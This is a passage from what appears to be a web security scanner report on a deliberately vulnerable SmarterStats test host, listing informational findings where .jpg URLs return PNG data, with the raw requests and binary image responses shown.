....g.    ..6.6jD...=(....wSi.....o..?....a?..".Y !Z~vp.2xy/A...q.Jh[......v..]ym(w.....E....]f....._...m%...v..y..x..a..."........].U.il......!.3..w.\wC(w..&Q!*........(i}..wR...oR<l.<...jH.....].|t.....<.R.F...V.!D.....On.%.;.ox#...Q...$.>.    ;T?..........,....y...B40vYzz.<...wyG..E!.{...V.!D.(..IL.{[(w..<.
w;.....n.U-8rx..ia......!j...uk*g..Jh[....Y$.w|pg(w6v+!..O...{.H#B...*..u.kg..FJ.........H....{.|}.].................p?.?a]nQH..
S....3..F.....z.......V...U..]U....B.....Xt.94c.....w...5.d.g.[..!.QV......~.#......Nn.....!...]U......!.....{6..z|........._>$.......6c..m%..~C.*Bt..6..[.7....JH...X-i..2.%...(s>.....f.q.....o.Q.h..,.....z.Y.!.+SQ...VH...H......mLl/.....o.Q.W.\.i.uuy...D'..$....h.W........6. ..
u...W.e+.m..BT.^z03:c]..?.$+.14s`JJ.\q......[....G.
.s.f+.m..BT........B..Z.QQ..L.....b..k....k..l%..~C.*..,.;......c.....Q)#Z....2...23........l%..~C...I.o...8xg]....EQ..w...}.3ce....N..u..d......o.Q1..........S.7..?..qdD..h.W.&L........
..0..I..l%..~C.....f|..O.......b.BT...:..+O..I.&Y[    m............8...1."..%!Z....2.....1k+.m..BTd.e.CV....Z..W......~.x...jA'.5r.Jh[........C........dDl~...~.e.......-3.e+.m..BT....{..;{Grfm.c....Qih..#D...O...3...{.Jh[...    ..)....'.3k D|jSF....R)..^%.M.q/[    m..................FFT..^9...Fy|.r.G..VB..7.H.....N.......X.!*....P..........8.....o.....-pN.......#Ya!*    Q.#Bi.y......l.8.....o...gm..p../o@....9.....V.Si's..VB..wO."z.(=.......7:xg.##*gD.    ......._.vQY.l%..~.t!r...~.6..2[#.@.../..V...N)D.l^.........h.'..C.^!.~q7./..=.
idD..h...8..W.....UD...V.{.....Mo^....sM."..%!...P.e...dVD...\...V.M...-L.!...q5..;?D...
.H..hh6...S-.....    ...R.H...~..":.........W....5....NG........
.H... D$...}O,.7A.s!_mm.e..I..e.....O.....H...v.....4r5.;.....*..QLC..z..../.J.<.r...E....D.Mm.;I!.a.-. .y....Kmw.b....v.....#..$.......+...s.Y.b..4G..)..S.................l.;)!.c.....\)f~.'4.i.....Y.....;~+c.bT.'.....".QI..:".vy..G...W*.!k+.m...2.1.N_ q...j1.X..q8......+gus.    ....|......."..K#...=..L.Q..VY.,>:.X...N!"!..nR...f/...D(:.......Z..z....5....of..m...CY."#*    .K...Y(...V...    ,Vd$ld......V.W........{..^'.(.7...../..r.}..\qv.+. D...9B...;.W.....s.    ,N.I.....!...$".,.RL=tK......R..n..4DS..}[.._..sE;...%.....73e.......Y..b.....~7"D..tF9eA...........<DS..........Wl?...fER....
9...$K..U...    ..O(....m....X...4....BD....<...x..........Z.!.
........Ol{..u.D.)/.$..D!......(.v{........]...C%...L..l.;........*1.w?..g.....-..=D..N...c......wY...X .n..Q6.....].LQ.n.T...-..h..G..h....o>..O..{.....-D..m.P..8$.(......b..    b.G...^}.#......G..W.?Glp.......?.^......-.Y"fm.&&m......;...h....V4_B...e. ...z.....].......N.I$...*..h...H.b...Q.=.i.h~{..<l_...x[.7f.u...} ...@[^4...Q..E!"a.p...#

zrAD.Eo..#m...].u:>7..+.:(#...j1t....3.o.V#W8C.......77L.......Q.}..^r...(^h.......1E...AM.J.........w..h.q..y.b.B...*..Qiii..6mB.....1.._......gh.B+.F$.6^..MX.w...-...o..M...OV.;vL?..j..w[..n.....{
.=+Sx|..V.....
..V.T@.-....".!J......................p....n&D.....A.K...7..s..tM>}...F.........Ym.........].aA6...=pob)..X*...k)..7...f...f.w...H.(.=.A..'g.Z........\>/......g.Z.Wp.V....Y.B../..E&.%ojq./..hS..A?,.>..W..?...e<N<......[...U.=..&B..".)....w...W7..~.K.Xp...O.=..,8.....Xw......|J..`..{....7NB....Y
....8.'D.?.Y...    ...:B......o%U......j.JT.J...Qu
.&JY.....~.jV.....X;.!N...nF....8.....&$....R....n..E..o.u...OT..V..J.B.2..D.H.=U2:.G.)2.o.B..vT..kp..g."e(N..D.#o.ds.y....g~+-.{TF.!B.9..Ib.(....h    dD....I.s2Y......fYlGi..;.....e......_.......v....(R....5.~n.z.#J.i..4DK"#.M....U..%=....9.....YjG...    . 2;.r.q...b`].......*...}.).Q......fasJ._.6...?..."...........K.~.....v...ib..c9[2.'..Y.X..y..........I>>..@ ..@...C...... D=...D .u. DY.!...z.......h"..:.........=...Q..d4..d...Q.{..........t2.......(.=...@.@.B..:.M..YG.B....@.. .!....&...#..,#t.Xy......IEND.B`.

10.42. http://vulnerable.smarterstats.6.0.host:9999/Temp/aae65ef47a3d4937bffc2e1dbe58c809.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/aae65ef47a3d4937bffc2e1dbe58c809.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/aae65ef47a3d4937bffc2e1dbe58c809.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=Webmaster
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:32 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8B4CAA00"
Content-Type: image/jpeg
Content-Length: 18895
Connection: Close

.PNG
.
...IHDR...l...........h.....sRGB.........gAMA......a....    pHYs..........o.d..IdIDATx^..    XTW...|.7.....u.d.3.&..M.........q...]ADQ.\..Q.DT"..*...".... "".....t:.6Kw.....UV.Uu.....z..I.U...;....g{..............P4...]:...@..@..@..@. l.. .. .. .. .p..6.7.... .. .. ...6............P8................................(...M...............}..@..@..@...N.....B.@..@..@..@...>.. .. .. ..
'.aSx..x .. .. .. .aC................)..P<..........................    @...@(...........@...@..@..@..@@.. l
o ...@..@..@.. l.. .. .. .. .p..6.7.... .. .. ...6............P8................................(...M...............}..@..@..@...N.....B.@..@..@..@...>....x.N=....../.K.{...(..k.c.8.p..{.;.i|..@..@@.. l.n_......2..q.5.Qw\..@..@.+. l^......-.2.....$
....MY..
......E..a%..L.........l..6Cf....U#E.A..@..l...........6!g!......4....\..]. v...$i|...;Z....@..@@-. lji).S9.j..f..U....g.Q.*3jU'e..Y4.:.\.....?.$.......    ....[......(    ........M....;I........E....g..brv.L..O...;.....m8v.IH........+    @.\I.....Z    .....f.$.3..{>..Z.O...|..#..Z.......8E....6|H.........9l..O.!Pks...GY...FD^.".&..... ...&.as7a\_{...6Fa.J....*.7+.D....sh..l&o.^..F .. .2..6.5.....&0*&......mq?......3..6t........{J]...%....../...y.>n.j!.,.ZZ
.....*...V[......PR..R.c:W.P
.v$:.....Qd.....D.K.....[    @..........aQ.7w.x............m.~zy.zi3`..dj..W.fs.Q.....w.........9~.t.9[r$..{s.......%...).5P..P0.^x.C..~.>.R..    ..bE.V.;n.$V,X,c...R..|.....$.qy../.....)     ....2g..............8D.........M..Y6...K.L}"............^t.....\.j#yF.k..B/.XO.....~\..@..@... l...{...    8.e.a...li...4........?.......uZyY..q.x.......BUy.F.A@.. l*h$....D.7..#(,w<......-.d..?.."....hY:9;.C.<....R..*..., .!..65&.... .......^.IcI......H..Z.4[2.s.....7.o..`...............QS.p    .....t(.y..3K...7Y..6..........)/...wQVF.%......h...M.M......p.m..3.p.@...,u.)..p.....Q..;AoO.J!.s n....2.h...M.M.
..k    pf-8.,.i.zj........J.kt..p..9{....rA.$n....._..Qp5.......i..QA.p...i...    .,.......T...K.P.yi.&D..6u#5..C./.U4.8V.._.....}.~.
...........H.. n....
.....M...:.@-....../Q.......n..n+....tj5c.5..GG,.x4......k;;..,;K...+c.......M...Z4!>
. ....64"....".[s4..A..O.4...,..s.>..5..D>B....&..v.....#....C.,.x.....5..6....j...P>....p...,;].d.........32J..C..    ...........7...@.<....H...... `".....yj.....tt.....v.Z..M...".Q......Q..Y......J...[.A..x........}..@@"....Ls.<.....E..@..iZ..'.......\..v.g..I[igV1z'....H. l.. .s... lG.......,,-...A[..h61AZyZ..n.
...C...X...............@../.KX*.^p.V.!.....<..00h:a-uZt......7...../.@...K..6..=j.s........b!pf..g.XHXLxH.Q3.....j.E.g>.....<..ZT...K.....G.uJ....D.Q.yG.W':#k.G....4.D...x.0.X.2n........t.....&.a.u...z#.C.-g...................1.}..F_p.?.5..o.nl.......=............j....}...\.6..I'. \...:._[.....xM......z...'.....M.]...@ %....Ju.....G.yjM..A...qa.3...f.a.46.C.].u............    ,O.'..i..W..W(m..s...e."`3u.qn.G.%9.6.?.......6t...0.).............k.. ...t..I.....Xv.xO=.@...I....vE.tN.W...H.;..qH.z..%....."......N.m....._r....g.......v..5.)....f..._tH....H..%...:...p;..\G.m.....b...>....    @..........q..QY.py...,....J[..|.8/....g...>......5...a+.S.%...#.>...NID(...Q.J..P.v.).....GU.A....vF-u@..w...r32<_...T!j. ...W......... m:x.QE]......QY....v.....;glZ.L&_q`;B..Z.n......6...9mX=..'........Z.u.$....P..........f...B...b."p....}.4...R.#.a._....".!]..8.].0(gh..>.BD......+Hy/>.@./..........Pr..8.w...../k|r.8..y.&.........}...^ ...$.aSg...:'.....q.8<<..,a.    .<q...#...........3.|.(........T...I....vC.uL..1n.....dY...<.....n+.dK[..bj...X.....P............A..9.+..Z..#."4.@dN{....6l../..P'...:...)..Y..b.!Y.{./..Y..P...p..m..~...."...5.:}.Pm.P'...:...!..G_.O..i...U..7.Q...!j:....S.%.^.0..wv........*..:    @...n(.......3../.P.....NH{.!...}..bY.#m<.........t.4.. .N..6u..J.3.<|..Xr...$.V...:e.)B.....]......iBuA@.. l.l7.ZG.2..S...Y..._$-2h=s7B......./.?.<'..F... .l..6e..J.s.<..8`.u.+............@.AO.Q...,...{.a.......'.aS|...z&..#.Z/.7..CaRv............w.._.......'.aS|...z%....n+..M.^..X......{..FC.P...z}.Po.P<........+..xp.........~kmf.C.A.>.S..{}.xt....b..^.pPo....)..P@=.pd..............#[}.\.E!.s..... .x..6.7.
.7._=..|.....>Y.2#.W]..k.0........K.......U.....Z...<..pp.....Zw.....'..@...>.C....tl..\.....4.E.
....MuM..k...:.....?...y% ........e..m0u.]..T.......#.aS]...Z& 7....9.....y....".lZ..A.4M.....E..D@nv.....B..KC..C}...c..l>..t.....!...4M.....E..D@nv..\k.v...N..>kV.\..1..<.d5=B(+.h...M.........Z.......[5 ...>.!.(.^_*K...:@.....1B9A@.. l.n^TN-...]$.y'....m<.....j...F...k..k.Ld."...... .i..6M7/*...|.......w..kb...CB.A.......e.?a...W..    ..y..6.71*.t.    G
.9..v3.RvM..E..+.._.9.}N:c4<....U.c.....    @.4.....    4.A~..v.xv^.%._C.....o.lo......`..... .=..6....A@.6..O..G.g\!....0pe.../.....
..O....6@    tL@.V.].dK...`..>.92.x....a....I...!.aSLS. z# w..|.u..@..[.@O.g.b.....P_....).EP......x..^v...:E.B..[......+..U9.......W/....S.....&..x...]!..]}@.............. .r..6.7 ..N._=.....D.....6......n...c....r&.Q.^:W.P...J.*'.aSy....$.%..|....G.k......0pk.Xv.n_da..8.T..@..<O...y..#......n....x....3B.N#...}.?..]i...2u...O0.....@......7.^.Zg.F..................6...&....... .Y..6....@@...s....].G].P...<......4. .8_.'..@... l..........@6.M......`..> g.h.EghB|..d.......y.8n.........6..m1d...>..4...v.+.....A....0......v.& w.Z......<..<...n..`...~....f...<L...a....    .=....K.s..`..>.M...s.h...h..k.~.Q{..0......v.&0gK.......j;k.{C.....0.J...PbwX.....i..........X.N @....KL..?...n......o........R...x.A..<H...A.....<r.......n+..`..>..'.-<...<b=..L.@..<C........P../......1...*..6..x...<W........%.a.,o.M..2..S......+.........}@...l.../3T.+. l^..........u...H..../..9..6........(.. ....6.`.M.H 01.Z,....`.-.3..`..>.._..c.JQ=~....$.a.&}.[W.:..G.V^..B.'}#...}.O..'lX).../TV.. l
h..A.....H.    ...I.3..!...}@..UX)...-.R9. l.i..D...z.=.&..^..?....+D..W....../c.....P5....).IP -..T..|........'...........+E..m.:)...M.-.ri......(h.,a.........l..;..%....g........).eP.M.8p.T.F..Z..(.......[.....vYS.**..J%.aSj..\.".Y..F.....W.!.@    }...2....$..E.\.......R    @...2(.....4.3............ox&.....g........).eP.M..,.g#.e.z%..aC......ak...M.........R    @...2(.....>|..=a.#..`..> cH.Md..Xu\S.**..J%.aSj..\.".Y..F@. c..1..c g.A..|.6...UT...J.....A.4E@......E!...}..... TF.. l.hDTA..d    ...T.#......%.d.qDm..9.<..V4.}..L.....%.....i..Q....+l}..!.g.{}.5..H...@.z..!......4s.<.....m.K......@...6.U...J...6m.#j.p.r.. j...`.b....a.=..4j..)..>..[.V..
%...J..5.^..:..7...K%.....[././T.A.|.m...V.^.......+.)F.@... l........U.{V.Zt....]....,...A.D....uo.....A.o..a>.......
y.G1o.J;..Jy..R..:t).u:..O.....J.OyG.I"....t.8.....eb...4}.t)BBB(22...]K.6m..{."l0..o.........u..6......9......./d..8.......ED).Mqj.O)....\...N|....K...Gi....m....$...-.H._mF..7.".:........I.r.....1Tzy..\K....$.cacqc.X.l....Rbb"......');;.!.dee......p.U......Px...#l}.P...Y...0..).../.g...B..1.c.......+.i..F4*..]...
{.2E^..t.B.....F.Mi'.x...J......tv................!..j.......C..IC..g...En..u.y.fI..(q.6.|S..J&.aSr..l.! G.xHt@.].........P.F?.........1.'4?.).]mK..........]..w.jq.[7Jk.........J.......D..K..UQ;zt.)..x....Kg._..q.;^3..+.CE..)##....%..L....)::..._O.v....4M..=a;r..-X.@3.;*... .as.U\.....s.;...Mw.2....6.LN...=..w.1.W...l.W.K....>.{...kGE}.Z..=z..V-(......5.?...    ......xz.5...........tj..L..W3.K..eE...z.4......]*...%K(..N.9...?~\3"gK..(l.S....'..H}....J.=b(.b....ft..]UN\... l.....@...../H........P..m.c..T..g5...........P..!m"BrZ....(qP+....^...[jKsy.G....7e]....}..t.1....V}U...Z.H.U.sC...uTt9Y.Ve..l..y.(88X.VMHH...$I.X~N.>...a`-    .$k...\..Rj....I.,%..?..".as.H\..l..,.OM.Sl.MU)l.6.%.."..:4....O......e...U..W;.b...4x...dD.*.._v\.....-.2oFy.&.....f'b..q.M.r. r.a..........H..,=..........K"....;w.....+p...W.r.T..*`...#.R..?..7.e.|L..l.......~#..\@......u...~V.g.\Oz..L~.EV.<Sh.%..sU..F.    a.h..Z."P..Kzg.v.......B....t\.C...
Q.&+...A....kg!m,p..7..I...6s.....syK.$..P.1..{..iA[zp...V}.0...0.zf_C.".UY...<D7.r.l.o-b.v$"".bbb$...g..;v.."go...[XX....Kq..a.^,zeeeR|....x.Yx,..T.|!e..T...A....M.9Cf.$J....a.9..[...q=..Yd.ed...!TFK....6.5.
.V.... K..l.K...tYq.:M..g{{R.....Z..i..Wi....bRrS...&]z_.i........$.U+S.-u..b.[K1...K...Vt.LC!roJ....^4.....E9S.aU.v...+.mGx2.q...!.V.l\ff&.={.#aO..n.J.7n4../.`a;p..I.8.h...(v.9~.Gaa.....r.~EH.'+....Y.*.....5f....V..5a.&Wf....3.....oC..J5.....N.......".g.v.+.)m..-=.n-G....."...COw.Y;.X|..5...sZX.Wc....!.....}.h..Z.$o.Y..I....~..e.......[IWz...J2........&e.Nn....U..........s.aU.r$44....o..C.g..qi....6^d..%.e.....?."."g\..r7w.\...e....#..d.l    ...R...J.....)lV....U..8..s..5..>..[... ..@....ct.ma.[Z..v.Q...O..g|..~..(..Sqq...MoP...5.......:tx....3H].yb..=b....^.5M..y{...jO.........}..B..{...|..v.Ns.a.K.....*=*.rF...|..U.V..U..=.t&..........:^.s....Jv..x.].......E......Z}..ZZ*%.MK...(....D.....o+G.1...65....F....^N.....,..QDA7..z..XT...lG7...2rE.............Y.......Ry.Xlq.-)....|.*..^..........V.o.v.x..o?.....%.W.......9.....{(.._..Z%j!bU..9#sr..@..b..s.\.uju-.[.... ....sY.FlG0.a.E..q....T.....=....@.....j,..GC..............yk..2......;......+.....Vm#.U...coK.9..e.aU.9..........9..#...x...S........#.2l<4..E.r.i...<.i.....C...We.....X.V...1..a3....9 lb.De.......)..>..{... `" w/6.....1R0h.P..>#..P?.....h....%.=mF...4*.!.On@.C..5...S)ou...A..gv.....Z|[...-mK)..Gyb.C.kbX..e...4...\_.V}.u9}..7.d^.i~../....<?m...t........S.6%x....&.aC......T..|.........F........@....\..e[z.......Sv............C....F.{....7sy.,..}...>......4......P...../........4...#,r..........@...>... ..?~.:c6R..e6..........M..@...Tq.}...u>.}.Kve.(tA....9...!.P..6O....Jy[......>;.M.....(.[...6.=g..zz..g.....mGx..o;........}...C@.JQ^x0v.}...OJ...o}..........C.J..t.e.......i.<1\..?..>..qV.y...%.|............n.\..y.v..Y..&E.q...@.s.0$.9....P....;...a.1bHt.n...mw.....v.......k..M......d...=...7h.G..d...E.......sy./.-.'}W>.%.mY....8.......h.......y.6n.....R.Y..
./<........;....6......(#._)*.;-/.';.\.MCW.Mq#....#..Fy[e.y........q...T].d..@..<G...9.....W.....<.>..w[...&$?.M.....&v..Ltl.G.x...6.5..z......F.7..    M.d.h.DN.~"...L.6........`.q..,a......^ ...#.a..k.    .$.....KL.Ma....M..@..b.y.8.}.<!jC<....G'.\............-ib.;tm...5f..".Jng..7..../..mB....o..........c}.Mv....r.....3._(..J..........g...#..|.....I.N|........~.....Y%...1~.....[.....U.?.kQ"}^..)...6.5...}.s...ox..,...Rt.........f.2zvp0U.a.d./.#.lu..5.....D..qS..>..!mJ...E.}.......>B......U.!B.....
......J...sAt6...7.9....\......Y...:.%P)l3...3..Ma.dc.%/....@i..G....&..9.....o...."...........?y..M...7....H.......g...............40..e...n}...#[,X.........F.E.....0i.7{.fk.....Tzy.]L..o.#el......Y8.|....NU.....,....Lac).).z...(....-.a.1..6.F..av.jR'...2...V.o..{.....,%.5....[0..z...Ka..0.*gU....,.#_.
~/.M....i....>...6.......}.j6Fl.C>....[......._.;Z.....1..X....,.G{G..[..."..>o...-..|...onW...y.X.......g..$....d.B..........39.f.......L...c...a[.P3q.......aD..Y.<5.W..J12.........1....tY...}....Q..{..6.E5...C.~`..*...6.7...M.r.c.E    <....i-..z5...RV......._'.....\...Z....4$.mZ3..*..\,9...iC.~.i..k..Q.Fy.[qK:..?.~(.f..%.$..6x8VzU.......Y...#l..*.s..H...t..AK....W._9lZ..6.iU4.......l.i....w4|>9I....=G.U)p....aQ..._=. .8O`KF...9b7.6|.=.....b....2d.-_8^...E.......Mh..!.....h..F.6....0A5qs.0*..M...Z.v+.v..8.+CdD.....].......g..z.I.y.d    ......I4.........%Li(.4.Z...Y,.l`Ua..Y+..#l.8.....fY..,^M....B@-...cY.G..W.,.p.C.as?c......;,....L.T3...)...........O....s_......)......R..qT:i...Hl    b.6.V.....W.v..$.Rh
.V......W+..j"c......<..D.Z...rX....p..r...'[.g.>5.......>....l{,.d$...a..`...Z..;,:1.>..<.D.X).t..A.'F+..g.?Zu....a.....4|N}.<~....D,..I...,.E.Z.............5..)Cc.....&
Y}k.9S..^5..2.J. ....s....f....S..6.U.6..J;.2m....._...6Xb....%\..@....aQ.Dw....=.'\.V.....QTqr....[:.,.R\.p.....4(...x0.N...(.<X...m....l.._V29.U.fCr..l..g.:Di9.f.    ....\6...f.c3.de.....I.LJ|>.Mj.........9XN.wlH..[rAu......-..Y.W.:K.f.JT..(
..j$ wX......[..OU..6.J.....s.N.Ul...U...Kk.G.,.^.@....Cc.S...........,aKl...^...GM.e.5...ZW..u.E=w-.25.a.\...@......#...`!lj........P..aT.....|mS......9.....G4h.[.a...N.................^.&`.i2[...b.VzT..55)........{.........8..f..TU.s....EIQ".vJ.
Ux.pb,e......Oko.vi....Qq.(rb+*..PD......[...s....3~.. .F..67...A........;i+../.........H5.,....C.:/@L........6.}..J..%.liC.............%kW.v.5..G..^w..A...H...F..4..!.`g.....+l......)D..........B......#.C........[".`..1.>].6......r.k....!..0.@...J...U..9......'n.^...J..-:;..............MV]...O    ...u%....2?...oQ...t{...F..q..k<\....n...Q....2.........&...M-.d........C.h..c..[.@.....1..=E..}.h:..SZW8.6....X~a.XA....4........Qn..l..;..w..C
. ....6.4......=..Sw..6..cB..
=.H.1qW..@....Q...._.G...K..&.5.
F...oS...tg.,.G.82K.B.~...Yn...x@A...@....F@.@.    ..:J.......b..........E...n...    T!dM....AtD.
.xk..c].....    -.......5..\....5>>......
. ....6.4....L ..>5    N.+l.e...>...L1....f.....D..5....@k.5.OJ.x$.nmG.f.........'".....P)...J....&.V...%......l..s.....,......3C...i*.........J.z,..........`.;w...3w.{..%l9.......]....j.R..6.6...M.....O@.]a.,..m.B..y=z.\...GR.. M.i!l    .z    a......H...I..&..!m.......5....w.j.~..6..!j.1.r......H..}.....p....b..l.&......_..,.....(...-::m(...W....([.8.......*T...O....6D4F..}...m>xXtQ.c.........R...ggj:N...>.7m......:..F5.-S.RyX.s!dO.6...i..............
.....z.)YC..v.....<.3R...tO.+B...|.ohC...,d-...xc*.\...O.Dw.....1c......6.8xP+......!.a.LS."Z"....<4...)E...#.v..5.....    .9!...N..S.P...F....^.).....M.|.|...
.w.-l..5...N..)Sh.......Zz.P..P5........2..Y..b.!YY6....F..x........SP.,.sst..6..mK^.m.gz-B...+H....P..p..`.sd(4Ml.{B,p0.X.X.X.......5..TA....fB!.J@.6..e.hk.[e.3x...Q.i....\...gfQ...K[n..a...X.9........R..6kQ...P[....h...#{.2......(.. .u..6.7.
...    .6.M...:...m.8.~...n..........Y.....2.c....wi....F..qb...tt.(*.....l...65kFw...vD>..||.$nW.m..#{/....BW............O..y...........Dq=.p1.../Q.....F..u.....?.4.m.EM....#b...0............ .qg.Wc..i4lyC.6}....4..An......o..RG...k...    ..aS.7[.'.br..a.K
..8..........n..S..|Y....xo.......).......N...u....A...    Y....|3.F.nB1..........{..-kW.t.....E.....2J.>\
.w.......?....D._2..lc.,3lWB..C./m~F|V...z.3|.y.....e..C.]...pq....i.eQ/M.x....8p7.'..%m.7.....>..Z..!~........"W.]C..G>.#....wB...?iG!.-.x. ...C..-[..M..~V8...6..9*}.o*W..%...?..K7y.l,[s.*.F+..$_.>.\..'...'.;..t..!..&.3]...e..o.....6t..P    .GV...!,.C.+2.8.KO..Z.=H......."..\.x....@...)&..nCc.....~...d.v.G..+^<.......|7..d...<7....m]..hq..^......Q.,....3.............B...r...R8....@.......    .[y../9'+......r.me.c....).t.5.*.. ,.|}d<...s..Zt..4../M<.Pd^...;.....:Pb....+^A.+IW7h@K_y...s.@....a.C.B.,$..TYd..B<.1.....$...\. l...Ub. lJl..    ........3m;../.-m....*!l.D..|...y..+..../.x.?%.....-.H.5cL....C_....j.6.....s..s.\..[Y.i.U6..rH.r.........Y...I".&.V..q........Bz#.a.[....'p..!..J.....$...OHN..|...[E_d.'...a...=.RJ.K..|..".x.....-.l..`a....i5i.*d...aU=.....R.$U..f{H.....[...J^.s.."T.]3.......<.dPU.QX%...).5P...I`..bj.zXv...G.=a...p.{.!......m..g..6....a.+.^....m...4(..E}..$m......!.j|I.fZ.i&kv3ZU2t.+9..w.Q....5..k.    ._...j.KN..2{....k.qc.......P....I..1<.'2m5.......o.!Dm)B...;......}....u%.l..Q.f.7.ak......,!k..<..@...I....vC.A@"06..:..qH....O..?.5g../2..t..+B/-C.d.c^.8...h...J...#...cY.f>.md.;4q..8Z
.. .b..6.7............u^~.!i...>........+2n.....0q........K...K_...K..1.C..5..6f]kz...x`@..TL.....C.A.    .....R.KL.C.6b.=I..W..~...B.
.q.?.-.Y......)..R.DJy$-+.....<..k..............M...........N..qE.I[..+.@.(.&7...
...J.4.......Q....pZt.+d.:.....M..........R.Y.d...r.d.jz..3QN..\j..I...[ .
.Z.A..,wY...JaW.A.....& .4......A.P..I.........>...0....6RTd|L..W!.dP...6.iL..G.$6....+-..5^.::.....T^.E.@...&.as..>...$`....-.:<.h.&JY..$kFi...8...DWW#.d e........Up.n.......
..)..D.@... l...k.............-f...9#..Ze...w!:7W.[,.A.."_.M....OW9.........5.=O(..(...M    ..2.....W.v..7e.Z/...A..e.(m.O."..C.W..2.|}2......=.q(x.5..H.D.3k.u.G.>..u.s.K..R.@....(.....K.....>m........d.(n.{R...TQ..!.A~.+.Yd..<X-+v.    s:.......F.i..;..... .$..6%.....n ....Y..Z._F_lm.....-c.aN....;...}L...HG?....?...%......MJkDc..._...=.....P.....Z.e..7......R.p*.z.~Ln....t...iTq-.a.....I.N..*l...iAA.Z.......]...~..^.....(...MI......    |....,..}...9i...........a...SGPj.o.......N.E^.^+Q...#?iD...tso..A...D.....@Y@.....{....H_ml........(o.U.n@.. {.....i..0....e...J.x.4.|S...........[...(...MI.......|..gteY.*..W;i3.[n......o.E;..J..?.....M8.C.W...3ki.N1../...]......QY.xN..|K..M.........Z.*.zS......'.....#.)c.O(.T.Z    .g..%.P......~%5....)..'.. ..:".a.Qc.. P..i.t...(.~..M:1a..Q.$...EI...uDgg...n.X...m.x.ia3f.....h:^h..4...\F.....    ...N.....[.....T..>.,.c..$.....Ab..<.qK.
!o.....N."..........?....8$m3/T..Um........X%.G..tB.....F5A@...EG)7..t?..k.mFyc.91B....v}#U........I.R6...V.....U+'[.&.mH.V4..Y......=..:]N..= ..*'.aSy... .j..m+.=.r..HO..mWH.    K..W....'.a..-...'...../C...,7..'.|....6.uh#\.6.7.@...M.....E.@.i....SALKi.......7c&.`.....CT.Gts...p..e    eN$J.U...D.......,[...4|}C....
.|BG_<...Fy../.......i.mQ3.p    .i.t...d.+.YM*+#wt ..qDgfPE~...&.Q...'........D...).j-hU...M>tx..Y..........lJ.n....x../B..........    @...<(..(...b..ss~C...7c..<..2..=UH...e.........^..|&*.P?.K.=...._.h..J......>.z..C....o......6    @............$I....L.9.'*.}.....<..3i..}9....uk....q>.HC..H.U..K2...........R...^..}..../...;[n|..\D..."..............4..q..........2.]In...5..1....;..o.;fu{..-8T...G...}_......=i.gf...Bfn...U...!l....{......q3......V......%.^.....Y.$%d.~LnE...#........z....x>.[^5J.K..L.e..g.X...9.....4e.....]\..M9......k..f..lV..!.a.a.^N.`...u..ni.\To. lzkq....D..'-?.H..........]-t.y{.P_..w6...d......xm=..8\...a.7..`...,....`.....V.l.n..Y6..+o,....2j&A.Y:.HCy.....fC.....-......M...*...    p..x......T..'M...y.........D<........l.l.b..V..Y..E&.l(.B.,.N.......,....).W.1.re6$Zc&.2sh%K..or[..s....+(.. ..V    <)H..7.*t..n{..5.......J.41..C.J.4.F....P....7.O....k.C.f.Um^..pi..Vf..aRS......eZx...Y.eUa.\Pa....]..;PU.........@.c.X.x...u.2R".v...^m....*x..s!.6lm"..,i<.........,Y.6sj..g...5.;WU..d....V....6.L8[~]..T... l...K...8N..Y.J.L.V.fM...2......x.x...u.."..66..g..^...R)ma".U.>t.~q...j..V3l.E....Is.j.of..E6..&sQr..6.C..._K}.u......... ....~......LI.n..!5.V..S..$OF....O..BW58.f.x.O\..p..x.uyh....(.[R....b.,J....^be...\..W.r-..,.0......=.|.wT.0_Uj....k..".+O-..9.J...W.,...+..P.....i.AQ..........J.d..;......jp6.............a....6..I....9..i..z
.*.......9..o....$...#wa=O....*....wf3\..W.7.....G0.& ...........|.......M...i.9Q.....^.Y.m..*......... lN@.G@..<C.8..3w.]@..@@.. l.m....tO.d.8i.(^ .. .w..6.......L. ....+.@..@@.. lz...?.(.@....o..(..(.....x....3.q....'....+l^..7|..@@{. l.kS...4A..i.&*.J....@-    @.j    .....p..l.....*...:    @...n(5.h..6..|... ......9..o......l..9.......    @...F(!.x...DZ..D7.....@a....>t}..i..... ...%.aSo... .~....R..g......[.......M5M......xQ..i........P,...b..........a.\..?... ....6.4.
..
$ g...DzjV.+1m....j.......*.K.H ...!.a..w....A...6u.B)A..@.3. l......:    @...n(5.....@.4...........0q)....p....yv.$.h...9lb_..<W.(.Dq].............<..^..L[.6.................E q......0.Y..f.Y.9{....#.....(...M.......    dR..~d.d..Uf...Xy......R.2s......{...5._..Q{.......).qP4..;...4I..2X.w...z......(...M.M.........a^...,.M.d....wFtV..Yy?......B    @...0(.....F..V9,....j.1....q..^.......@...J.....A.@....x......i.bu...ynr... .. .P..6.6.... PI@...Q.1.VC....mV... .. .P..6.6.... `23i.....9....a~.qH..yn...*S+..t....P(...B..............#...............(...M...............}..@..@..@...N.....B.@..@..@..@...>.. .. .. ..
'.aSx..x .. .. .. .aC................)..P<..............l.R.......IEND.B`.

10.43. http://vulnerable.smarterstats.6.0.host:9999/Temp/ab51ac96f4bc4739bd3a746f1b589cd7.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/ab51ac96f4bc4739bd3a746f1b589cd7.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/ab51ac96f4bc4739bd3a746f1b589cd7.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
